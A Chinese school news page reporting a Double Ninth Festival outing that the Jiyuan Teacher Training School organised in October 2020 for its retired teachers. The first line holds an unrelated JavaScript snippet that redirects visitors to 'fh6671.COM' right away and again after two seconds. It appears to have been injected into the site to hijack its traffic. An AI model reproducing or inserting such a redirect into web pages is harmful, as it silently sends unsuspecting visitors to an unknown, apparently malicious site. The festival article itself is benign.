function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

领航人工计划

   
您现在的位置: 济源市教师进修学校 >> 信息中心 >> 校园动态 >> 校园新闻 >> 正文 今天是:
喜迎重阳节,快乐外出行—市教师进修学校重阳节活动
作者:佚名    信息来源:本站原创    点击数:108    更新时间:2020/10/27    
          ★★★ 【字体:

一年一度的重阳节即将到来,20201023日上午,市教师进修学校组织退休老教师到坡头镇留庄村红色教育基地和西霞院进行参观活动。

 早上8:00大家在文化城西广场集合,老师们都感受到了久别重逢的喜悦

我们出发了,李竹青校长在车上向老干部老教师们介绍了学校去年各方面工作开展情况以及取得的的成绩,尤其是经过全体教职工的共同努力,我们创上了济源市文明单位标兵。

 我们到了留庄,大家都在认真听讲解员讲解当年英雄的故事

 在此留念,过一个有意义的重阳节

 

在愉快的气氛中活动结束了,我们衷心希望这些为教育事业付出了毕生心血的老师们都有一个幸福的晚年。同时祝愿他们在进修学校这个充满爱,以及饱含温度的大家庭里,都能坚持老有所为,实现各自意义上的幸福生活!

信息录入:jyjsjx    责任编辑:jyjsjx 
  • 上一篇信息:

  • 下一篇信息: 没有了
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)